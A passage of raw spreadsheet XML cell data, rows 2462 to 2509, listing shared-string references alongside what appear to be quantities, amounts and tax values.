      <c r="E2462" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2462" s="238" t="s">
        <v>11573</v>
      </c>
      <c r="G2462" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2462" s="10">
        <v>5</v>
      </c>
      <c r="I2462" s="14">
        <v>27.71</v>
      </c>
      <c r="J2462" s="15">
        <v>4.432</v>
      </c>
      <c r="K2462" s="16"/>
    </row>
    <row r="2463" spans="2:11">
      <c r="B2463" s="9">
        <v>2497</v>
      </c>
      <c r="C2463" s="238" t="s">
        <v>11574</v>
      </c>
      <c r="D2463" s="238" t="s">
        <v>11575</v>
      </c>
      <c r="E2463" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2463" s="238" t="s">
        <v>11576</v>
      </c>
      <c r="G2463" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2463" s="10">
        <v>310</v>
      </c>
      <c r="I2463" s="14">
        <v>633.86</v>
      </c>
      <c r="J2463" s="15">
        <v>101.184</v>
      </c>
      <c r="K2463" s="16"/>
    </row>
    <row r="2464" spans="2:11">
      <c r="B2464" s="9">
        <v>2498</v>
      </c>
      <c r="C2464" s="238" t="s">
        <v>11577</v>
      </c>
      <c r="D2464" s="238" t="s">
        <v>11578</v>
      </c>
      <c r="E2464" s="238" t="s">
        <v>11579</v>
      </c>
      <c r="F2464" s="238" t="s">
        <v>11567</v>
      </c>
      <c r="G2464" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H2464" s="10">
        <v>83</v>
      </c>
      <c r="I2464" s="14">
        <v>8891.66</v>
      </c>
      <c r="J2464" s="15">
        <v>1422.6864</v>
      </c>
      <c r="K2464" s="16"/>
    </row>
    <row r="2465" spans="2:11">
      <c r="B2465" s="9">
        <v>2499</v>
      </c>
      <c r="C2465" s="238" t="s">
        <v>11580</v>
      </c>
      <c r="D2465" s="238" t="s">
        <v>11581</v>
      </c>
      <c r="E2465" s="238" t="s">
        <v>11582</v>
      </c>
      <c r="F2465" s="238" t="s">
        <v>11583</v>
      </c>
      <c r="G2465" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2465" s="10">
        <v>112</v>
      </c>
      <c r="I2465" s="14">
        <v>114.81</v>
      </c>
      <c r="J2465" s="15">
        <v>18.4576</v>
      </c>
      <c r="K2465" s="16"/>
    </row>
    <row r="2466" spans="2:11">
      <c r="B2466" s="9">
        <v>2500</v>
      </c>
      <c r="C2466" s="238" t="s">
        <v>11584</v>
      </c>
      <c r="D2466" s="238" t="s">
        <v>11585</v>
      </c>
      <c r="E2466" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F2466" s="238" t="s">
        <v>11586</v>
      </c>
      <c r="G2466" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2466" s="10">
        <v>3</v>
      </c>
      <c r="I2466" s="14">
        <v>724.35</v>
      </c>
      <c r="J2466" s="15">
        <v>115.896</v>
      </c>
      <c r="K2466" s="16"/>
    </row>
    <row r="2467" spans="2:11">
      <c r="B2467" s="9">
        <v>2501</v>
      </c>
      <c r="C2467" s="238" t="s">
        <v>11587</v>
      </c>
      <c r="D2467" s="238" t="s">
        <v>11588</v>
      </c>
      <c r="E2467" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2467" s="238" t="s">
        <v>11589</v>
      </c>
      <c r="G2467" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2467" s="10">
        <v>117</v>
      </c>
      <c r="I2467" s="14">
        <v>2248.13</v>
      </c>
      <c r="J2467" s="15">
        <v>359.6112</v>
      </c>
      <c r="K2467" s="16"/>
    </row>
    <row r="2468" spans="2:11">
      <c r="B2468" s="9">
        <v>2502</v>
      </c>
      <c r="C2468" s="238" t="s">
        <v>11590</v>
      </c>
      <c r="D2468" s="238" t="s">
        <v>11591</v>
      </c>
      <c r="E2468" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F2468" s="238" t="s">
        <v>11592</v>
      </c>
      <c r="G2468" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2468" s="10">
        <v>150</v>
      </c>
      <c r="I2468" s="14">
        <v>256.41</v>
      </c>
      <c r="J2468" s="15">
        <v>41.04</v>
      </c>
      <c r="K2468" s="16"/>
    </row>
    <row r="2469" spans="2:11">
      <c r="B2469" s="9">
        <v>2503</v>
      </c>
      <c r="C2469" s="238" t="s">
        <v>11593</v>
      </c>
      <c r="D2469" s="238" t="s">
        <v>11594</v>
      </c>
      <c r="E2469" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2469" s="238" t="s">
        <v>11595</v>
      </c>
      <c r="G2469" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2469" s="10">
        <v>166</v>
      </c>
      <c r="I2469" s="14">
        <v>6866.38</v>
      </c>
      <c r="J2469" s="15">
        <v>1098.5216</v>
      </c>
      <c r="K2469" s="16"/>
    </row>
    <row r="2470" spans="2:11">
      <c r="B2470" s="9">
        <v>2504</v>
      </c>
      <c r="C2470" s="238" t="s">
        <v>11596</v>
      </c>
      <c r="D2470" s="238" t="s">
        <v>11597</v>
      </c>
      <c r="E2470" s="238" t="s">
        <v>4912</v>
      </c>
      <c r="F2470" s="238" t="s">
        <v>11598</v>
      </c>
      <c r="G2470" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2470" s="10">
        <v>4</v>
      </c>
      <c r="I2470" s="14">
        <v>86.18</v>
      </c>
      <c r="J2470" s="15">
        <v>13.792</v>
      </c>
      <c r="K2470" s="16"/>
    </row>
    <row r="2471" spans="2:11">
      <c r="B2471" s="9">
        <v>2505</v>
      </c>
      <c r="C2471" s="238" t="s">
        <v>11599</v>
      </c>
      <c r="D2471" s="238" t="s">
        <v>11600</v>
      </c>
      <c r="E2471" s="238" t="s">
        <v>4912</v>
      </c>
      <c r="F2471" s="238" t="s">
        <v>11601</v>
      </c>
      <c r="G2471" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2471" s="10">
        <v>10</v>
      </c>
      <c r="I2471" s="14">
        <v>76.92</v>
      </c>
      <c r="J2471" s="15">
        <v>12.304</v>
      </c>
      <c r="K2471" s="16"/>
    </row>
    <row r="2472" spans="2:11">
      <c r="B2472" s="9">
        <v>2506</v>
      </c>
      <c r="C2472" s="238" t="s">
        <v>11602</v>
      </c>
      <c r="D2472" s="238" t="s">
        <v>11603</v>
      </c>
      <c r="E2472" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2472" s="238" t="s">
        <v>11604</v>
      </c>
      <c r="G2472" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2472" s="10">
        <v>2</v>
      </c>
      <c r="I2472" s="14">
        <v>2153.85</v>
      </c>
      <c r="J2472" s="15">
        <v>344.6176</v>
      </c>
      <c r="K2472" s="16"/>
    </row>
    <row r="2473" spans="2:11">
      <c r="B2473" s="9">
        <v>2507</v>
      </c>
      <c r="C2473" s="238" t="s">
        <v>11605</v>
      </c>
      <c r="D2473" s="238" t="s">
        <v>11606</v>
      </c>
      <c r="E2473" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2473" s="238" t="s">
        <v>11607</v>
      </c>
      <c r="G2473" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2473" s="10">
        <v>11</v>
      </c>
      <c r="I2473" s="14">
        <v>1310.77</v>
      </c>
      <c r="J2473" s="15">
        <v>209.7216</v>
      </c>
      <c r="K2473" s="16"/>
    </row>
    <row r="2474" spans="2:11">
      <c r="B2474" s="9">
        <v>2508</v>
      </c>
      <c r="C2474" s="238" t="s">
        <v>11608</v>
      </c>
      <c r="D2474" s="238" t="s">
        <v>11609</v>
      </c>
      <c r="E2474" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2474" s="238" t="s">
        <v>11610</v>
      </c>
      <c r="G2474" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2474" s="10">
        <v>6</v>
      </c>
      <c r="I2474" s="14">
        <v>1386.77</v>
      </c>
      <c r="J2474" s="15">
        <v>221.8848</v>
      </c>
      <c r="K2474" s="16"/>
    </row>
    <row r="2475" spans="2:11">
      <c r="B2475" s="9">
        <v>2509</v>
      </c>
      <c r="C2475" s="238" t="s">
        <v>11611</v>
      </c>
      <c r="D2475" s="238" t="s">
        <v>11612</v>
      </c>
      <c r="E2475" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2475" s="238" t="s">
        <v>11613</v>
      </c>
      <c r="G2475" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2475" s="10">
        <v>1</v>
      </c>
      <c r="I2475" s="14">
        <v>24.85</v>
      </c>
      <c r="J2475" s="15">
        <v>3.976</v>
      </c>
      <c r="K2475" s="16"/>
    </row>
    <row r="2476" spans="2:11">
      <c r="B2476" s="9">
        <v>2510</v>
      </c>
      <c r="C2476" s="238" t="s">
        <v>11614</v>
      </c>
      <c r="D2476" s="238" t="s">
        <v>11615</v>
      </c>
      <c r="E2476" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2476" s="238" t="s">
        <v>11616</v>
      </c>
      <c r="G2476" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2476" s="10">
        <v>50</v>
      </c>
      <c r="I2476" s="14">
        <v>5982.91</v>
      </c>
      <c r="J2476" s="15">
        <v>957.28</v>
      </c>
      <c r="K2476" s="16"/>
    </row>
    <row r="2477" spans="2:11">
      <c r="B2477" s="9">
        <v>2511</v>
      </c>
      <c r="C2477" s="238" t="s">
        <v>11617</v>
      </c>
      <c r="D2477" s="238" t="s">
        <v>11618</v>
      </c>
      <c r="E2477" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2477" s="238" t="s">
        <v>11619</v>
      </c>
      <c r="G2477" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2477" s="10">
        <v>97</v>
      </c>
      <c r="I2477" s="14">
        <v>11182.15</v>
      </c>
      <c r="J2477" s="15">
        <v>1789.1456</v>
      </c>
      <c r="K2477" s="16"/>
    </row>
    <row r="2478" spans="2:11">
      <c r="B2478" s="9">
        <v>2512</v>
      </c>
      <c r="C2478" s="238" t="s">
        <v>11620</v>
      </c>
      <c r="D2478" s="238" t="s">
        <v>9741</v>
      </c>
      <c r="E2478" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2478" s="238" t="s">
        <v>9742</v>
      </c>
      <c r="G2478" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2478" s="10">
        <v>32</v>
      </c>
      <c r="I2478" s="14">
        <v>131.61</v>
      </c>
      <c r="J2478" s="15">
        <v>21.0432</v>
      </c>
      <c r="K2478" s="16"/>
    </row>
    <row r="2479" spans="2:11">
      <c r="B2479" s="9">
        <v>2513</v>
      </c>
      <c r="C2479" s="238" t="s">
        <v>11621</v>
      </c>
      <c r="D2479" s="238" t="s">
        <v>11622</v>
      </c>
      <c r="E2479" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2479" s="238" t="s">
        <v>11623</v>
      </c>
      <c r="G2479" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2479" s="10">
        <v>420</v>
      </c>
      <c r="I2479" s="14">
        <v>1751.94</v>
      </c>
      <c r="J2479" s="15">
        <v>280.224</v>
      </c>
      <c r="K2479" s="16"/>
    </row>
    <row r="2480" spans="2:11">
      <c r="B2480" s="9">
        <v>2514</v>
      </c>
      <c r="C2480" s="238" t="s">
        <v>11624</v>
      </c>
      <c r="D2480" s="238" t="s">
        <v>11625</v>
      </c>
      <c r="E2480" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F2480" s="238" t="s">
        <v>11626</v>
      </c>
      <c r="G2480" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2480" s="10">
        <v>29</v>
      </c>
      <c r="I2480" s="14">
        <v>1543.27</v>
      </c>
      <c r="J2480" s="15">
        <v>246.9408</v>
      </c>
      <c r="K2480" s="16"/>
    </row>
    <row r="2481" spans="2:11">
      <c r="B2481" s="9">
        <v>2515</v>
      </c>
      <c r="C2481" s="238" t="s">
        <v>11627</v>
      </c>
      <c r="D2481" s="238" t="s">
        <v>11628</v>
      </c>
      <c r="E2481" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F2481" s="238" t="s">
        <v>11629</v>
      </c>
      <c r="G2481" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2481" s="10">
        <v>143</v>
      </c>
      <c r="I2481" s="14">
        <v>4898.56</v>
      </c>
      <c r="J2481" s="15">
        <v>783.8688</v>
      </c>
      <c r="K2481" s="16"/>
    </row>
    <row r="2482" spans="2:11">
      <c r="B2482" s="9">
        <v>2516</v>
      </c>
      <c r="C2482" s="238" t="s">
        <v>11630</v>
      </c>
      <c r="D2482" s="238" t="s">
        <v>8579</v>
      </c>
      <c r="E2482" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2482" s="238" t="s">
        <v>11631</v>
      </c>
      <c r="G2482" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2482" s="10">
        <v>23</v>
      </c>
      <c r="I2482" s="14">
        <v>6966.85</v>
      </c>
      <c r="J2482" s="15">
        <v>1114.7088</v>
      </c>
      <c r="K2482" s="16"/>
    </row>
    <row r="2483" spans="2:11">
      <c r="B2483" s="9">
        <v>2517</v>
      </c>
      <c r="C2483" s="238" t="s">
        <v>11632</v>
      </c>
      <c r="D2483" s="238" t="s">
        <v>11633</v>
      </c>
      <c r="E2483" s="238" t="s">
        <v>11094</v>
      </c>
      <c r="F2483" s="238" t="s">
        <v>11634</v>
      </c>
      <c r="G2483" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2483" s="10">
        <v>3</v>
      </c>
      <c r="I2483" s="14">
        <v>4890.03</v>
      </c>
      <c r="J2483" s="15">
        <v>782.4048</v>
      </c>
      <c r="K2483" s="16"/>
    </row>
    <row r="2484" spans="2:11">
      <c r="B2484" s="9">
        <v>2518</v>
      </c>
      <c r="C2484" s="238" t="s">
        <v>11635</v>
      </c>
      <c r="D2484" s="238" t="s">
        <v>11636</v>
      </c>
      <c r="E2484" s="238" t="s">
        <v>7939</v>
      </c>
      <c r="F2484" s="238" t="s">
        <v>11567</v>
      </c>
      <c r="G2484" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2484" s="10">
        <v>3</v>
      </c>
      <c r="I2484" s="14">
        <v>19602.56</v>
      </c>
      <c r="J2484" s="15">
        <v>3136.4112</v>
      </c>
      <c r="K2484" s="16"/>
    </row>
    <row r="2485" spans="2:11">
      <c r="B2485" s="9">
        <v>2519</v>
      </c>
      <c r="C2485" s="238" t="s">
        <v>11637</v>
      </c>
      <c r="D2485" s="238" t="s">
        <v>11638</v>
      </c>
      <c r="E2485" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F2485" s="238" t="s">
        <v>11639</v>
      </c>
      <c r="G2485" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2485" s="10">
        <v>3</v>
      </c>
      <c r="I2485" s="14">
        <v>7435.89</v>
      </c>
      <c r="J2485" s="15">
        <v>1189.7424</v>
      </c>
      <c r="K2485" s="16"/>
    </row>
    <row r="2486" spans="2:11">
      <c r="B2486" s="9">
        <v>2520</v>
      </c>
      <c r="C2486" s="238" t="s">
        <v>11640</v>
      </c>
      <c r="D2486" s="238" t="s">
        <v>11641</v>
      </c>
      <c r="E2486" s="238" t="s">
        <v>11642</v>
      </c>
      <c r="F2486" s="238" t="s">
        <v>11643</v>
      </c>
      <c r="G2486" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2486" s="10">
        <v>2</v>
      </c>
      <c r="I2486" s="14">
        <v>1839.32</v>
      </c>
      <c r="J2486" s="15">
        <v>294.2912</v>
      </c>
      <c r="K2486" s="16"/>
    </row>
    <row r="2487" spans="2:11">
      <c r="B2487" s="9">
        <v>2521</v>
      </c>
      <c r="C2487" s="238" t="s">
        <v>11644</v>
      </c>
      <c r="D2487" s="238" t="s">
        <v>11645</v>
      </c>
      <c r="E2487" s="238" t="s">
        <v>11642</v>
      </c>
      <c r="F2487" s="238" t="s">
        <v>11646</v>
      </c>
      <c r="G2487" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2487" s="10">
        <v>4</v>
      </c>
      <c r="I2487" s="14">
        <v>3658.11</v>
      </c>
      <c r="J2487" s="15">
        <v>585.2992</v>
      </c>
      <c r="K2487" s="16"/>
    </row>
    <row r="2488" spans="2:11">
      <c r="B2488" s="9">
        <v>2522</v>
      </c>
      <c r="C2488" s="238" t="s">
        <v>11647</v>
      </c>
      <c r="D2488" s="238" t="s">
        <v>11648</v>
      </c>
      <c r="E2488" s="238" t="s">
        <v>6704</v>
      </c>
      <c r="F2488" s="238" t="s">
        <v>11649</v>
      </c>
      <c r="G2488" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2488" s="10">
        <v>2</v>
      </c>
      <c r="I2488" s="14">
        <v>1085.85</v>
      </c>
      <c r="J2488" s="15">
        <v>173.7376</v>
      </c>
      <c r="K2488" s="16"/>
    </row>
    <row r="2489" spans="2:11">
      <c r="B2489" s="9">
        <v>2523</v>
      </c>
      <c r="C2489" s="238" t="s">
        <v>11650</v>
      </c>
      <c r="D2489" s="238" t="s">
        <v>11651</v>
      </c>
      <c r="E2489" s="238" t="s">
        <v>11652</v>
      </c>
      <c r="F2489" s="238" t="s">
        <v>11653</v>
      </c>
      <c r="G2489" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2489" s="10">
        <v>6</v>
      </c>
      <c r="I2489" s="14">
        <v>2957.26</v>
      </c>
      <c r="J2489" s="15">
        <v>473.1648</v>
      </c>
      <c r="K2489" s="16"/>
    </row>
    <row r="2490" spans="2:11">
      <c r="B2490" s="9">
        <v>2524</v>
      </c>
      <c r="C2490" s="238" t="s">
        <v>11654</v>
      </c>
      <c r="D2490" s="238" t="s">
        <v>11655</v>
      </c>
      <c r="E2490" s="238" t="s">
        <v>11656</v>
      </c>
      <c r="F2490" s="238" t="s">
        <v>11657</v>
      </c>
      <c r="G2490" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2490" s="10">
        <v>4</v>
      </c>
      <c r="I2490" s="14">
        <v>1135.04</v>
      </c>
      <c r="J2490" s="15">
        <v>181.6064</v>
      </c>
      <c r="K2490" s="16"/>
    </row>
    <row r="2491" spans="2:11">
      <c r="B2491" s="9">
        <v>2525</v>
      </c>
      <c r="C2491" s="238" t="s">
        <v>11658</v>
      </c>
      <c r="D2491" s="238" t="s">
        <v>11659</v>
      </c>
      <c r="E2491" s="238" t="s">
        <v>4689</v>
      </c>
      <c r="F2491" s="238" t="s">
        <v>11660</v>
      </c>
      <c r="G2491" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2491" s="10">
        <v>13</v>
      </c>
      <c r="I2491" s="14">
        <v>752.14</v>
      </c>
      <c r="J2491" s="15">
        <v>120.3488</v>
      </c>
      <c r="K2491" s="16"/>
    </row>
    <row r="2492" spans="2:11">
      <c r="B2492" s="9">
        <v>2526</v>
      </c>
      <c r="C2492" s="238" t="s">
        <v>11661</v>
      </c>
      <c r="D2492" s="238" t="s">
        <v>11662</v>
      </c>
      <c r="E2492" s="238" t="s">
        <v>7968</v>
      </c>
      <c r="F2492" s="238" t="s">
        <v>11663</v>
      </c>
      <c r="G2492" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2492" s="10">
        <v>14</v>
      </c>
      <c r="I2492" s="14">
        <v>36.75</v>
      </c>
      <c r="J2492" s="15">
        <v>5.8912</v>
      </c>
      <c r="K2492" s="16"/>
    </row>
    <row r="2493" spans="2:11">
      <c r="B2493" s="9">
        <v>2527</v>
      </c>
      <c r="C2493" s="238" t="s">
        <v>11664</v>
      </c>
      <c r="D2493" s="238" t="s">
        <v>11665</v>
      </c>
      <c r="E2493" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2493" s="238" t="s">
        <v>11666</v>
      </c>
      <c r="G2493" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2493" s="10">
        <v>1</v>
      </c>
      <c r="I2493" s="14">
        <v>384.62</v>
      </c>
      <c r="J2493" s="15">
        <v>61.5392</v>
      </c>
      <c r="K2493" s="16"/>
    </row>
    <row r="2494" spans="2:11">
      <c r="B2494" s="9">
        <v>2528</v>
      </c>
      <c r="C2494" s="238" t="s">
        <v>11667</v>
      </c>
      <c r="D2494" s="238" t="s">
        <v>11668</v>
      </c>
      <c r="E2494" s="238" t="s">
        <v>11669</v>
      </c>
      <c r="F2494" s="238" t="s">
        <v>11670</v>
      </c>
      <c r="G2494" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2494" s="10">
        <v>2</v>
      </c>
      <c r="I2494" s="14">
        <v>1282.05</v>
      </c>
      <c r="J2494" s="15">
        <v>205.1296</v>
      </c>
      <c r="K2494" s="16"/>
    </row>
    <row r="2495" spans="2:11">
      <c r="B2495" s="9">
        <v>2529</v>
      </c>
      <c r="C2495" s="238" t="s">
        <v>11671</v>
      </c>
      <c r="D2495" s="238" t="s">
        <v>11672</v>
      </c>
      <c r="E2495" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F2495" s="238" t="s">
        <v>11673</v>
      </c>
      <c r="G2495" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2495" s="10">
        <v>4</v>
      </c>
      <c r="I2495" s="14">
        <v>4593.51</v>
      </c>
      <c r="J2495" s="15">
        <v>734.9632</v>
      </c>
      <c r="K2495" s="16"/>
    </row>
    <row r="2496" spans="2:11">
      <c r="B2496" s="9">
        <v>2530</v>
      </c>
      <c r="C2496" s="238" t="s">
        <v>11674</v>
      </c>
      <c r="D2496" s="238" t="s">
        <v>11675</v>
      </c>
      <c r="E2496" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F2496" s="238" t="s">
        <v>11676</v>
      </c>
      <c r="G2496" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2496" s="10">
        <v>8</v>
      </c>
      <c r="I2496" s="14">
        <v>6923.07</v>
      </c>
      <c r="J2496" s="15">
        <v>1107.6864</v>
      </c>
      <c r="K2496" s="16"/>
    </row>
    <row r="2497" spans="2:11">
      <c r="B2497" s="9">
        <v>2531</v>
      </c>
      <c r="C2497" s="238" t="s">
        <v>11677</v>
      </c>
      <c r="D2497" s="238" t="s">
        <v>11678</v>
      </c>
      <c r="E2497" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2497" s="238" t="s">
        <v>11679</v>
      </c>
      <c r="G2497" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2497" s="10">
        <v>35</v>
      </c>
      <c r="I2497" s="14">
        <v>29381.64</v>
      </c>
      <c r="J2497" s="15">
        <v>4701.088</v>
      </c>
      <c r="K2497" s="16"/>
    </row>
    <row r="2498" spans="2:11">
      <c r="B2498" s="9">
        <v>2532</v>
      </c>
      <c r="C2498" s="238" t="s">
        <v>11680</v>
      </c>
      <c r="D2498" s="238" t="s">
        <v>11681</v>
      </c>
      <c r="E2498" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2498" s="238" t="s">
        <v>11682</v>
      </c>
      <c r="G2498" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2498" s="10">
        <v>1</v>
      </c>
      <c r="I2498" s="14">
        <v>666.67</v>
      </c>
      <c r="J2498" s="15">
        <v>106.6672</v>
      </c>
      <c r="K2498" s="16"/>
    </row>
    <row r="2499" spans="2:11">
      <c r="B2499" s="9">
        <v>2533</v>
      </c>
      <c r="C2499" s="238" t="s">
        <v>11683</v>
      </c>
      <c r="D2499" s="238" t="s">
        <v>11068</v>
      </c>
      <c r="E2499" s="238" t="s">
        <v>11069</v>
      </c>
      <c r="F2499" s="238" t="s">
        <v>11684</v>
      </c>
      <c r="G2499" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2499" s="10">
        <v>2</v>
      </c>
      <c r="I2499" s="14">
        <v>205.13</v>
      </c>
      <c r="J2499" s="15">
        <v>32.8224</v>
      </c>
      <c r="K2499" s="16"/>
    </row>
    <row r="2500" spans="2:11">
      <c r="B2500" s="9">
        <v>2534</v>
      </c>
      <c r="C2500" s="238" t="s">
        <v>11685</v>
      </c>
      <c r="D2500" s="238" t="s">
        <v>11686</v>
      </c>
      <c r="E2500" s="238" t="s">
        <v>11186</v>
      </c>
      <c r="F2500" s="238" t="s">
        <v>11687</v>
      </c>
      <c r="G2500" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2500" s="10">
        <v>6</v>
      </c>
      <c r="I2500" s="14">
        <v>519.65</v>
      </c>
      <c r="J2500" s="15">
        <v>83.1456</v>
      </c>
      <c r="K2500" s="16"/>
    </row>
    <row r="2501" spans="2:11">
      <c r="B2501" s="9">
        <v>2535</v>
      </c>
      <c r="C2501" s="238" t="s">
        <v>11688</v>
      </c>
      <c r="D2501" s="238" t="s">
        <v>11689</v>
      </c>
      <c r="E2501" s="238" t="s">
        <v>11690</v>
      </c>
      <c r="F2501" s="238" t="s">
        <v>11691</v>
      </c>
      <c r="G2501" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2501" s="10">
        <v>1</v>
      </c>
      <c r="I2501" s="14">
        <v>2538.46</v>
      </c>
      <c r="J2501" s="15">
        <v>406.1536</v>
      </c>
      <c r="K2501" s="16"/>
    </row>
    <row r="2502" spans="2:11">
      <c r="B2502" s="9">
        <v>2536</v>
      </c>
      <c r="C2502" s="238" t="s">
        <v>11692</v>
      </c>
      <c r="D2502" s="238" t="s">
        <v>11693</v>
      </c>
      <c r="E2502" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2502" s="238" t="s">
        <v>11694</v>
      </c>
      <c r="G2502" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2502" s="10">
        <v>15</v>
      </c>
      <c r="I2502" s="14">
        <v>5258.13</v>
      </c>
      <c r="J2502" s="15">
        <v>841.296</v>
      </c>
      <c r="K2502" s="16"/>
    </row>
    <row r="2503" spans="2:11">
      <c r="B2503" s="9">
        <v>2537</v>
      </c>
      <c r="C2503" s="238" t="s">
        <v>11695</v>
      </c>
      <c r="D2503" s="238" t="s">
        <v>11696</v>
      </c>
      <c r="E2503" s="238" t="s">
        <v>11697</v>
      </c>
      <c r="F2503" s="238" t="s">
        <v>11698</v>
      </c>
      <c r="G2503" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2503" s="10">
        <v>2</v>
      </c>
      <c r="I2503" s="14">
        <v>1071.38</v>
      </c>
      <c r="J2503" s="15">
        <v>171.4208</v>
      </c>
      <c r="K2503" s="16"/>
    </row>
    <row r="2504" spans="2:11">
      <c r="B2504" s="9">
        <v>2538</v>
      </c>
      <c r="C2504" s="238" t="s">
        <v>11699</v>
      </c>
      <c r="D2504" s="238" t="s">
        <v>11700</v>
      </c>
      <c r="E2504" s="238" t="s">
        <v>11701</v>
      </c>
      <c r="F2504" s="238" t="s">
        <v>11702</v>
      </c>
      <c r="G2504" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2504" s="10">
        <v>10</v>
      </c>
      <c r="I2504" s="14">
        <v>29.95</v>
      </c>
      <c r="J2504" s="15">
        <v>4.8</v>
      </c>
      <c r="K2504" s="16"/>
    </row>
    <row r="2505" spans="2:11">
      <c r="B2505" s="9">
        <v>2539</v>
      </c>
      <c r="C2505" s="238" t="s">
        <v>11703</v>
      </c>
      <c r="D2505" s="238" t="s">
        <v>11704</v>
      </c>
      <c r="E2505" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F2505" s="238" t="s">
        <v>11705</v>
      </c>
      <c r="G2505" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2505" s="10">
        <v>4</v>
      </c>
      <c r="I2505" s="14">
        <v>5868.57</v>
      </c>
      <c r="J2505" s="15">
        <v>2347.424</v>
      </c>
      <c r="K2505" s="16"/>
    </row>
    <row r="2506" spans="2:11">
      <c r="B2506" s="9">
        <v>2540</v>
      </c>
      <c r="C2506" s="238" t="s">
        <v>11706</v>
      </c>
      <c r="D2506" s="238" t="s">
        <v>11707</v>
      </c>
      <c r="E2506" s="238" t="s">
        <v>11116</v>
      </c>
      <c r="F2506" s="238" t="s">
        <v>11708</v>
      </c>
      <c r="G2506" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2506" s="10">
        <v>6</v>
      </c>
      <c r="I2506" s="14">
        <v>6309.08</v>
      </c>
      <c r="J2506" s="15">
        <v>1009.4496</v>
      </c>
      <c r="K2506" s="16"/>
    </row>
    <row r="2507" spans="2:11">
      <c r="B2507" s="9">
        <v>2541</v>
      </c>
      <c r="C2507" s="238" t="s">
        <v>11709</v>
      </c>
      <c r="D2507" s="238" t="s">
        <v>11710</v>
      </c>
      <c r="E2507" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2507" s="238" t="s">
        <v>11711</v>
      </c>
      <c r="G2507" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2507" s="10">
        <v>2</v>
      </c>
      <c r="I2507" s="14">
        <v>3230.77</v>
      </c>
      <c r="J2507" s="15">
        <v>516.9248</v>
      </c>
      <c r="K2507" s="16"/>
    </row>
    <row r="2508" spans="2:11">
      <c r="B2508" s="9">
        <v>2542</v>
      </c>
      <c r="C2508" s="238" t="s">
        <v>11712</v>
      </c>
      <c r="D2508" s="238" t="s">
        <v>11713</v>
      </c>
      <c r="E2508" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2508" s="238" t="s">
        <v>11714</v>
      </c>
      <c r="G2508" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2508" s="10">
        <v>2</v>
      </c>
      <c r="I2508" s="14">
        <v>2923.08</v>
      </c>
      <c r="J2508" s="15">
        <v>467.6928</v>
      </c>
      <c r="K2508" s="16"/>
    </row>
    <row r="2509" spans="2:11">
      <c r="B2509" s="9">
        <v>2543</v>
      </c>
      <c r="C2509" s="238" t="s">
        <v>11715</v>
      </c>
